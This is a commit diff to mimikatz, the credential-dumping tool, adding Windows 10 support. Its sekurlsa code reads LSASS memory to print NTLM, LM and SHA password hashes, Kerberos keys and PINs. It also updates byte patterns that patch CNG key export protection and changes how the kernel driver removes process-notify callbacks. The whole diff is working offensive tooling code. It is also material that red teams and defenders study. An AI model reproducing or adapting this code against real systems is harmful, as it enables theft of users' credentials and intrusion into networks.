Some fixes for mimidrv & crypto. Preparation for Windows 10.
This commit is contained in:
Benjamin DELPY
parent
253c460938
commit
4e798859ba
|
|
@ -374,7 +374,7 @@ NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_B
|
|||
if(bufferIn && (szBufferIn == sizeof(PCREATE_PROCESS_NOTIFY_ROUTINE)))
|
||||
{
|
||||
status = PsSetCreateProcessNotifyRoutine(*(PCREATE_PROCESS_NOTIFY_ROUTINE *) bufferIn, TRUE);
|
||||
if(pPsSetCreateProcessNotifyRoutineEx)
|
||||
if(!NT_SUCCESS(status) && pPsSetCreateProcessNotifyRoutineEx)
|
||||
status = pPsSetCreateProcessNotifyRoutineEx(*(PCREATE_PROCESS_NOTIFY_ROUTINE_EX *) bufferIn, TRUE);
|
||||
|
||||
if(NT_SUCCESS(status))
|
||||
|
|
|
|||
|
|
@ -78,13 +78,11 @@ PCWCHAR kuhl_m_kerberos_ticket_etype(LONG eType)
|
|||
switch(eType)
|
||||
{
|
||||
case KERB_ETYPE_NULL: type = L"null "; break;
|
||||
|
||||
case KERB_ETYPE_DES_PLAIN: type = L"des_plain "; break;
|
||||
case KERB_ETYPE_DES_CBC_CRC: type = L"des_cbc_crc "; break;
|
||||
case KERB_ETYPE_DES_CBC_MD4: type = L"des_cbc_md4 "; break;
|
||||
case KERB_ETYPE_DES_CBC_MD5: type = L"des_cbc_md5 "; break;
|
||||
case KERB_ETYPE_DES_CBC_MD5_NT: type = L"des_cbc_md5_nt "; break;
|
||||
|
||||
case KERB_ETYPE_RC4_PLAIN: type = L"rc4_plain "; break;
|
||||
case KERB_ETYPE_RC4_PLAIN2: type = L"rc4_plain2 "; break;
|
||||
case KERB_ETYPE_RC4_PLAIN_EXP: type = L"rc4_plain_exp "; break;
|
||||
|
|
@ -97,17 +95,46 @@ PCWCHAR kuhl_m_kerberos_ticket_etype(LONG eType)
|
|||
case KERB_ETYPE_RC4_PLAIN_OLD_EXP: type = L"rc4_plain_old_exp"; break;
|
||||
case KERB_ETYPE_RC4_HMAC_OLD: type = L"rc4_hmac_old "; break;
|
||||
case KERB_ETYPE_RC4_HMAC_OLD_EXP: type = L"rc4_hmac_old_exp "; break;
|
||||
|
||||
case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96_PLAIN: type = L"aes128_hmac_plain"; break;
|
||||
case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96_PLAIN: type = L"aes256_hmac_plain"; break;
|
||||
case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96: type = L"aes128_hmac "; break;
|
||||
case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96: type = L"aes256_hmac "; break;
|
||||
|
||||
default: type = L"unknow "; break;
|
||||
}
|
||||
return type;
|
||||
}
|
||||
|
||||
PCWCHAR kuhl_m_kerberos_ticket_ctype(LONG cType)
|
||||
{
|
||||
PCWCHAR type;
|
||||
switch(cType)
|
||||
{
|
||||
case KERB_CHECKSUM_NONE: type = L"none "; break;
|
||||
case KERB_CHECKSUM_CRC32: type = L"crc32 "; break;
|
||||
case KERB_CHECKSUM_MD4: type = L"md4 "; break;
|
||||
case KERB_CHECKSUM_KRB_DES_MAC: type = L"krb_des_mac "; break;
|
||||
case KERB_CHECKSUM_KRB_DES_MAC_K: type = L"krb_des_mac_k "; break;
|
||||
case KERB_CHECKSUM_MD5: type = L"md5 "; break;
|
||||
case KERB_CHECKSUM_MD5_DES: type = L"md5_des "; break;
|
||||
case KERB_CHECKSUM_SHA1_NEW: type = L"sha1_new "; break;
|
||||
case KERB_CHECKSUM_HMAC_SHA1_96_AES128: type = L"hmac_sha1_aes128 "; break;
|
||||
case KERB_CHECKSUM_HMAC_SHA1_96_AES256: type = L"hmac_sha1_aes256 "; break;
|
||||
case KERB_CHECKSUM_LM: type = L"lm "; break;
|
||||
case KERB_CHECKSUM_SHA1: type = L"sha1 "; break;
|
||||
case KERB_CHECKSUM_REAL_CRC32: type = L"real_crc32 "; break;
|
||||
case KERB_CHECKSUM_DES_MAC: type = L"dec_mac "; break;
|
||||
case KERB_CHECKSUM_DES_MAC_MD5: type = L"dec_mac_md5 "; break;
|
||||
case KERB_CHECKSUM_MD25: type = L"md25 "; break;
|
||||
case KERB_CHECKSUM_RC4_MD5: type = L"rc4_md5 "; break;
|
||||
case KERB_CHECKSUM_MD5_HMAC: type = L"md5_hmac "; break;
|
||||
case KERB_CHECKSUM_HMAC_MD5: type = L"hmac_md5 "; break;
|
||||
case KERB_CHECKSUM_HMAC_SHA1_96_AES128_Ki: type = L"hmac_sha1_aes128_ki"; break;
|
||||
case KERB_CHECKSUM_HMAC_SHA1_96_AES256_Ki: type = L"hmac_sha1_aes256_ki"; break;
|
||||
default: type = L"unknow "; break;
|
||||
}
|
||||
return type;
|
||||
}
|
||||
|
||||
void kuhl_m_kerberos_ticket_freeTicket(PKIWI_KERBEROS_TICKET ticket)
|
||||
{
|
||||
if(ticket)
|
||||
|
|
@ -165,7 +192,7 @@ void kuhl_m_kerberos_ticket_freeKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer
|
|||
|
||||
PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_ticket_createAppTicket(PKIWI_KERBEROS_TICKET ticket)
|
||||
{
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_Ticket, Seq_Ticket/*, Ctx_Ticket*/;
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_Ticket, Seq_Ticket;
|
||||
UCHAR integer1 = KERBEROS_VERSION;
|
||||
|
||||
if(App_Ticket = KULL_M_ASN1_CREATE_APP(ID_APP_TICKET))
|
||||
|
|
@ -184,7 +211,7 @@ PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_ticket_createAppTicket(PKIWI_KERBEROS_
|
|||
|
||||
PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_ticket_createAppKrbCred(PKIWI_KERBEROS_TICKET ticket, BOOL valueIsTicket)
|
||||
{
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred, Seq_KrbCred/*, Ctx_KrbCred*/, Seq_Root, App_EncKrbCredPart, App_Ticket;
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred, Seq_KrbCred, Seq_Root, App_EncKrbCredPart, App_Ticket;
|
||||
UCHAR integer1;
|
||||
|
||||
if(App_KrbCred = KULL_M_ASN1_CREATE_APP(ID_APP_KRB_CRED))
|
||||
|
|
|
|||
|
|
@ -104,6 +104,7 @@ void kuhl_m_kerberos_ticket_displayFlags(ULONG flags);
|
|||
void kuhl_m_kerberos_ticket_displayExternalName(IN LPCWSTR prefix, IN PKERB_EXTERNAL_NAME pExternalName, IN PUNICODE_STRING pDomain);
|
||||
BOOL kuhl_m_kerberos_ticket_isLongFilename(PKIWI_KERBEROS_TICKET ticket);
|
||||
PCWCHAR kuhl_m_kerberos_ticket_etype(LONG eType);
|
||||
PCWCHAR kuhl_m_kerberos_ticket_ctype(LONG cType);
|
||||
|
||||
void kuhl_m_kerberos_ticket_freeTicket(PKIWI_KERBEROS_TICKET ticket);
|
||||
PKERB_EXTERNAL_NAME kuhl_m_kerberos_ticket_copyExternalName(PKERB_EXTERNAL_NAME pName);
|
||||
|
|
|
|||
|
|
@ -692,23 +692,19 @@ BYTE PATC_WALL_SPCryptExportKey_EXPORT[] = {0xeb};
|
|||
#ifdef _M_X64
|
||||
BYTE PTRN_WI60_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x0f, 0x85};
|
||||
BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x75};
|
||||
BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x43, 0x24, 0x02, 0x75};
|
||||
BYTE PTRN_WN10b_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x75};
|
||||
BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x75};
|
||||
BYTE PATC_WI60_SPCryptExportKey_EXPORT[] = {0x90, 0xe9};
|
||||
KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WI60_SPCryptExportKey), PTRN_WI60_SPCryptExportKey}, {sizeof(PATC_WI60_SPCryptExportKey_EXPORT), PATC_WI60_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_SPCryptExportKey), PTRN_WIN8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10b, {sizeof(PTRN_WN10b_SPCryptExportKey), PTRN_WN10b_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75};
|
||||
BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x47, 0x1c, 0x02, 0x75};
|
||||
BYTE PTRN_WI10_SPCryptExportKey[] = {0xf6, 0x43, 0x1c, 0x02, 0x75};
|
||||
BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x43, 0x1c, 0x02, 0x75};
|
||||
KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_SPCryptExportKey), PTRN_WIN8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_SPCryptExportKey), PTRN_WI10_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#endif
|
||||
NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])
|
||||
|
|
|
|||
|
|
@ -207,12 +207,12 @@ BOOL kuhl_m_sekurlsa_nt6_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PKUHL_M
|
|||
KIWI_BCRYPT_HANDLE_KEY hKey; PKIWI_HARD_KEY pHardKey;
|
||||
PVOID buffer; SIZE_T taille; LONG offset;
|
||||
|
||||
if(pOs->MinorVersion < 2)
|
||||
if(pOs->BuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
{
|
||||
taille = sizeof(KIWI_BCRYPT_KEY);
|
||||
offset = FIELD_OFFSET(KIWI_BCRYPT_KEY, hardkey);
|
||||
}
|
||||
else if(pOs->MinorVersion < 3)
|
||||
else if(pOs->BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
{
|
||||
taille = sizeof(KIWI_BCRYPT_KEY8);
|
||||
offset = FIELD_OFFSET(KIWI_BCRYPT_KEY8, hardkey);
|
||||
|
|
|
|||
|
|
@ -173,7 +173,7 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
|
|||
cLsass.osContext.MinorVersion = pInfos->MinorVersion;
|
||||
cLsass.osContext.BuildNumber = pInfos->BuildNumber;
|
||||
|
||||
if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION))
|
||||
if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION) && !(MIMIKATZ_NT_MAJOR_VERSION >= 6 && cLsass.osContext.MajorVersion == 10))
|
||||
PRINT_ERROR(L"Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)\n", pInfos->MajorVersion, MIMIKATZ_NT_MAJOR_VERSION);
|
||||
#ifdef _M_X64
|
||||
else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64))
|
||||
|
|
@ -491,6 +491,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
UNICODE_STRING buffer;
|
||||
PVOID base;
|
||||
DWORD type, i;
|
||||
BOOL isNull = FALSE;
|
||||
|
||||
if(mesCreds)
|
||||
{
|
||||
|
|
@ -534,6 +535,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
|
||||
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
|
||||
kprintf(L"\n\t * Flags : %02x/N%02x/L%02x/S%02x/%02x/%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2, pPrimaryCreds10->isUnk3, pPrimaryCreds10->isUnk4);
|
||||
//kprintf(L"\n\t * Flags : %02x/N%02x/L%02x/S%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2);
|
||||
if(pPrimaryCreds10->isLmOwfPassword)
|
||||
{
|
||||
kprintf(L"\n\t * LM : ");
|
||||
|
|
@ -550,7 +552,12 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
kull_m_string_wprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
kprintf(L"\n\t * unknow : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0);
|
||||
for(i = 0; !isNull && (i < 128); i++)
|
||||
isNull |= !pPrimaryCreds10->UnkStruct[i];
|
||||
if(isNull)
|
||||
kprintf(L"[0..0]");
|
||||
else
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0);
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
|
||||
|
|
|
|||
|
|
@ -30,8 +30,8 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
|||
BOOLEAN isShaOwPassword;
|
||||
BOOLEAN isUnk1;
|
||||
BOOLEAN isUnk2;
|
||||
BOOLEAN isUnk3;
|
||||
BOOLEAN isUnk4;
|
||||
BOOLEAN isUnk3; //
|
||||
BOOLEAN isUnk4; //
|
||||
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
|
|
|
|||
|
|
@ -28,7 +28,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
|||
{
|
||||
dprintf("\n\t [%08x] %Z", credentials.AuthenticationPackageId, &primaryCredentials.Primary);
|
||||
if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
|
||||
flags = KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
|
||||
flags = (NtBuildNumber < KULL_M_WIN_BUILD_10b) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10;
|
||||
else if(RtlEqualString(&primaryCredentials.Primary, &CREDENTIALKEYS_STRING, FALSE))
|
||||
flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
|
||||
else
|
||||
|
|
@ -48,34 +48,57 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
|||
}
|
||||
}
|
||||
|
||||
const KERB_INFOS kerbHelper[] = {
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pinCode),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_LOGON_SESSION),
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, pinCode),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
|
||||
}
|
||||
};
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_KERBEROS_LOGON_SESSION session;
|
||||
PBYTE data;
|
||||
UNICODE_STRING pinCode;
|
||||
KIWI_KERBEROS_KEYS_LIST_6 keyList;
|
||||
PKERB_HASHPASSWORD_6 pHashPassword;
|
||||
DWORD i;
|
||||
ULONG_PTR ptr;
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier), pData->LogonId))
|
||||
ULONG KerbOffsetIndex = (NtBuildNumber < KULL_M_WIN_BUILD_10b) ? 0 : 1;
|
||||
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, &session, sizeof(KIWI_KERBEROS_LOGON_SESSION), NULL))
|
||||
if(data = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&session.credentials, pData->LogonId, 0);
|
||||
if(session.pinCode)
|
||||
if(ReadMemory((ULONG_PTR) session.pinCode, &pinCode, sizeof(UNICODE_STRING), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
|
||||
if(session.pKeyList)
|
||||
if(ReadMemory((ULONG_PTR) session.pKeyList, &keyList, sizeof(KIWI_KERBEROS_KEYS_LIST_6) - sizeof(KERB_HASHPASSWORD_6), NULL))
|
||||
if(pHashPassword = (PKERB_HASHPASSWORD_6) LocalAlloc(LPTR, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6)))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) session.pKeyList + sizeof(KIWI_KERBEROS_KEYS_LIST_6) - sizeof(KERB_HASHPASSWORD_6), pHashPassword, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6), NULL))
|
||||
if(ReadMemory(ptr, data, (ULONG) kerbHelper[KerbOffsetIndex].structSize, NULL))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (data + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0);
|
||||
if(*(PUNICODE_STRING *) (data + kerbHelper[KerbOffsetIndex].offsetPin))
|
||||
if(ReadMemory((ULONG_PTR) *(PUNICODE_STRING *) (data + kerbHelper[KerbOffsetIndex].offsetPin), &pinCode, sizeof(UNICODE_STRING), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
|
||||
if(*(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
if(ReadMemory((ULONG_PTR) *(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetKeyList), &keyList, sizeof(KIWI_KERBEROS_KEYS_LIST_6)/* - sizeof(KERB_HASHPASSWORD_6)*/, NULL))
|
||||
if(pHashPassword = (PKERB_HASHPASSWORD_6) LocalAlloc(LPTR, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6)))
|
||||
{
|
||||
dprintf("\n\t * Key List");
|
||||
for(i = 0; i < keyList.cbItem; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST);
|
||||
if(ReadMemory((ULONG_PTR) *(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetKeyList) + sizeof(KIWI_KERBEROS_KEYS_LIST_6)/* - sizeof(KERB_HASHPASSWORD_6)*/, pHashPassword, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6), NULL))
|
||||
{
|
||||
dprintf("\n\t * Key List");
|
||||
for(i = 0; i < keyList.cbItem; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST);
|
||||
}
|
||||
LocalFree(pHashPassword);
|
||||
}
|
||||
LocalFree(pHashPassword);
|
||||
}
|
||||
}
|
||||
LocalFree(data);
|
||||
}
|
||||
}
|
||||
else dprintf("KO");
|
||||
|
|
@ -210,13 +233,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN ULONG_PTR reserved,
|
|||
DWORD nbCred = 0;
|
||||
ULONG_PTR pCur, pRef;
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
|
||||
ULONG CredOffsetIndex;
|
||||
PBYTE buffer;
|
||||
|
||||
if(NtBuildNumber < KULL_M_WIN_BUILD_7)
|
||||
CredOffsetIndex = 0;
|
||||
else
|
||||
CredOffsetIndex = 1;
|
||||
ULONG CredOffsetIndex = (NtBuildNumber < KULL_M_WIN_BUILD_7) ? 0 : 1;
|
||||
|
||||
if(pData->pCredentialManager)
|
||||
{
|
||||
|
|
|
|||
|
|
@ -25,7 +25,27 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
|
|||
BOOLEAN isLmOwfPassword;
|
||||
BOOLEAN isShaOwPassword;
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
|
||||
} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
|
||||
BOOLEAN isUnk0;
|
||||
BOOLEAN isNtOwfPassword;
|
||||
BOOLEAN isLmOwfPassword;
|
||||
BOOLEAN isShaOwPassword;
|
||||
BOOLEAN isUnk1;
|
||||
BOOLEAN isUnk2;
|
||||
BOOLEAN isUnk3;
|
||||
BOOLEAN isUnk4;
|
||||
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
BYTE UnkStruct[128];
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10, *PMSV1_0_PRIMARY_CREDENTIAL_10;
|
||||
|
||||
typedef struct _RPCE_COMMON_TYPE_HEADER {
|
||||
UCHAR Version;
|
||||
|
|
@ -72,11 +92,10 @@ typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
|
|||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PVOID unk4;
|
||||
KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];
|
||||
//KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];
|
||||
} KIWI_KERBEROS_KEYS_LIST_6, *PKIWI_KERBEROS_KEYS_LIST_6;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
||||
{
|
||||
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
|
||||
ULONG UsageCount;
|
||||
LIST_ENTRY unk0;
|
||||
PVOID unk1;
|
||||
|
|
@ -105,7 +124,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
|||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PKIWI_KERBEROS_KEYS_LIST_6 pKeyList;
|
||||
PVOID pKeyList;
|
||||
PVOID unk23;
|
||||
LIST_ENTRY Tickets_1;
|
||||
FILETIME unk24;
|
||||
|
|
@ -116,6 +135,54 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
|||
PUNICODE_STRING pinCode; // not only PIN (CSP Info)
|
||||
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_LOGON_SESSION_10 {
|
||||
ULONG UsageCount;
|
||||
LIST_ENTRY unk0;
|
||||
PVOID unk1;
|
||||
ULONG unk1b;
|
||||
FILETIME unk2;
|
||||
PVOID unk4;
|
||||
PVOID unk5;
|
||||
PVOID unk6;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
FILETIME unk7;
|
||||
PVOID unk8;
|
||||
ULONG unk8b;
|
||||
FILETIME unk9;
|
||||
PVOID unk11;
|
||||
PVOID unk12;
|
||||
PVOID unk13;
|
||||
#ifdef _M_IX86
|
||||
ULONG unkAlign;
|
||||
#endif
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
|
||||
ULONG unk14;
|
||||
ULONG unk15;
|
||||
ULONG unk16;
|
||||
ULONG unk17;
|
||||
PVOID unk18;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID pKeyList;
|
||||
PVOID unk23;
|
||||
LIST_ENTRY Tickets_1;
|
||||
FILETIME unk24;
|
||||
LIST_ENTRY Tickets_2;
|
||||
FILETIME unk25;
|
||||
LIST_ENTRY Tickets_3;
|
||||
FILETIME unk26;
|
||||
PUNICODE_STRING pinCode; // not only PIN (CSP Info)
|
||||
} KIWI_KERBEROS_LOGON_SESSION_10, *PKIWI_KERBEROS_LOGON_SESSION_10;
|
||||
|
||||
typedef struct _KERB_INFOS {
|
||||
LONG offsetLuid;
|
||||
LONG offsetCreds;
|
||||
LONG offsetPin;
|
||||
LONG offsetKeyList;
|
||||
SIZE_T structSize;
|
||||
} KERB_INFOS, *PKERB_INFOS;
|
||||
|
||||
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
|
||||
{
|
||||
ULONG isSupp;
|
||||
|
|
|
|||
|
|
@ -196,11 +196,13 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
{
|
||||
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10;
|
||||
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
|
||||
PKERB_HASHPASSWORD_6 pHashPassword;
|
||||
UNICODE_STRING buffer;
|
||||
PVOID base;
|
||||
DWORD type, i;
|
||||
BOOL isNull = FALSE;
|
||||
|
||||
if(mesCreds)
|
||||
{
|
||||
|
|
@ -237,6 +239,36 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
|
||||
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
|
||||
|
||||
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
|
||||
